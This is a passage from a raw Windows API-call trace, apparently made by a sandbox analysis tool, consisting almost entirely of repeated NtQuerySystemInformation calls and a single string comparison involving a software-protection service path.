NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e920, Length=0x28, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e920, Length=0x28, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7c0, Length=0x20, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e740, Length=0x20, ResultLength=0x0) [0240.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e740, Length=0x20, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e740, Length=0x20, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x28, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0240.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x20, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x20, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x20, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x20, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed20, Length=0x50, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaf0, Length=0x28, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x20, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea50, Length=0x20, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x38, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x20, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x20, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x20, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x28, ResultLength=0x0) [0240.535] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eee0, Length=0x50, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x28, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecb0, Length=0x28, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x28, ResultLength=0x0) [0240.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed30, Length=0x28, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x20, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x20, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee10, Length=0x38, ResultLength=0x0) [0240.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x20, 